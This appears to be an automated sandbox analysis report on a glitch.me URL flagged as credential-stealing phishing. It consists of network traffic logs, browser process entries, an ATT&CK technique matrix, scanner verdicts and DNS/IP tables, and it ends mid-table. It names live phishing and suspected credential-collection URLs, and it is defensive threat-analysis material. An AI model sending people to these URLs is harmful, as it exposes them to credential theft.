      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57825
      Source: unknownNetwork traffic detected: HTTP traffic on port 57926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57940
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57950
      Source: unknownNetwork traffic detected: HTTP traffic on port 57696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57714
      Source: unknownNetwork traffic detected: HTTP traffic on port 57948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57716
      Source: unknownNetwork traffic detected: HTTP traffic on port 57719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57952
      Source: unknownNetwork traffic detected: HTTP traffic on port 57778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57951
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57961
      Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57909
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57908
      Source: unknownNetwork traffic detected: HTTP traffic on port 57800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57905
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57904
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57907
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57906
      Source: unknownNetwork traffic detected: HTTP traffic on port 57949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57901
      Source: unknownNetwork traffic detected: HTTP traffic on port 57961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57900
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57919
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57916
      Source: unknownNetwork traffic detected: HTTP traffic on port 57927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57917
      Source: unknownNetwork traffic detected: HTTP traffic on port 57983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57912
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57911
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57910
      Source: unknownNetwork traffic detected: HTTP traffic on port 57856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57895
      Source: unknownNetwork traffic detected: HTTP traffic on port 57751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57890
      Source: unknownNetwork traffic detected: HTTP traffic on port 57780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57782
      Source: unknownNetwork traffic detected: HTTP traffic on port 57728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57784
      Source: unknownNetwork traffic detected: HTTP traffic on port 57688 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57780
      Source: unknownNetwork traffic detected: HTTP traffic on port 57854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57789
      Source: unknownNetwork traffic detected: HTTP traffic on port 57888 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57674
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57675
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57790
      Source: unknownNetwork traffic detected: HTTP traffic on port 57807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57792
      Source: unknownNetwork traffic detected: HTTP traffic on port 57968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57791
      Source: unknownNetwork traffic detected: HTTP traffic on port 57769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57687 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57676
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57677
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57678
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57679
      Source: unknownNetwork traffic detected: HTTP traffic on port 57792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57684
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57685
      Source: unknownNetwork traffic detected: HTTP traffic on port 57750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57686
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57680
      Source: unknownNetwork traffic detected: HTTP traffic on port 57705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57681
      Source: unknownNetwork traffic detected: HTTP traffic on port 57877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57725
      Source: unknownNetwork traffic detected: HTTP traffic on port 57770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57969
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57847
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57723
      Source: unknownNetwork traffic detected: HTTP traffic on port 57793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57843
      Source: unknownNetwork traffic detected: HTTP traffic on port 57901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57970
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57971
      Source: unknownNetwork traffic detected: HTTP traffic on port 57947 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57735
      Source: unknownNetwork traffic detected: HTTP traffic on port 57830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57859
      Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57733
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57675 version: TLS 1.2
      Source: classification engineClassification label: mal60.phis.win@19/173@84/23
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2164,i,9098095843155022011,1846821648532487114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2164,i,9098095843155022011,1846821648532487114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://astonishing-maize-sunstone.glitch.me/100%Avira URL Cloudphishing
      https://astonishing-maize-sunstone.glitch.me/4%VirustotalBrowse
      https://astonishing-maize-sunstone.glitch.me/100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      d26p066pn2w0s0.cloudfront.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://url.spec.whatwg.org/#url-parsing0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.png0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/icons---logos/icons/weather-icons/partly_cloudy.svg0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svg0%Avira URL Cloudsafe
      https://yourir.info/lib/1.15.18/yourir.css0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js0%Avira URL Cloudsafe
      https://v8.dev/blog/elements-kinds#avoid-creating-holes0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
      https://www.eldersrealestate.com.au/&#34;0%Avira URL Cloudsafe
      https://yourir.info/api/v50%Avira URL Cloudsafe
      https://apimprd.ext.elders.com.au/api/v1/WeatherDetail?postCode=50000%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.png0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js0%Avira URL Cloudsafe
      https://yourir.info/lib/0%Avira URL Cloudsafe
      https://eldersrural.sc.omtrdc.net/b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s5288101782031?AQB=1&ndh=1&pf=1&t=6%2F10%2F2024%200%3A29%3A53%203%20300&mid=01878392218234141113567963242819045089&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=01878392218234141113567963242819045089&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=10%Avira URL Cloudsafe
      https://yourir.info/0%Avira URL Cloudsafe
      https://infra.spec.whatwg.org/#ascii-tab-or-newline0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.png0%Avira URL Cloudsafe
      https://milo.za.com//pood/phpp4all.php0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf0%Avira URL Cloudsafe
      https://www.eldersrealestate.com.au/0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpg0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpg0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg0%Avira URL Cloudsafe
      https://elders.com.au/content/dam/eld/images/staff-in-action/staff-outdoors/elders_staff_infront_of_shed_and_machinery.jpg0%Avira URL Cloudsafe
      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      151.101.129.229
      truefalse
        high
        star-mini.c10r.facebook.com
        157.240.251.35
        truefalse
          high
          eldersrural.sc.omtrdc.net
          63.140.62.17
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              yourir.info
              45.76.112.20
              truefalse
                high
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  high
                  d26p066pn2w0s0.cloudfront.net
                  13.32.27.129
                  truefalseunknown
                  milo.za.com
                  188.114.96.3
                  truefalse
                    high
                    scontent.xx.fbcdn.net
                    157.240.0.6
                    truefalse
                      high
                      astonishing-maize-sunstone.glitch.me
                      54.91.146.110
                      truefalse
                        unknown
                        elders.com.au
                        162.159.140.34
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.17.25.14
                          truefalse
                            high
                            s-part-0036.t-0009.t-msedge.net
                            13.107.246.64
                            truefalse
                              high
                              www.google.com
                              142.250.186.132
                              truefalse
                                high
                                upload.wikimedia.org
                                185.15.59.240
                                truefalse
                                  high
                                  apimprd.ext.elders.com.au
                                  172.66.0.34
                                  truefalse
                                    unknown
                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                    52.211.141.218
                                    truefalse
                                      high
                                      unpkg.com
                                      104.17.245.203
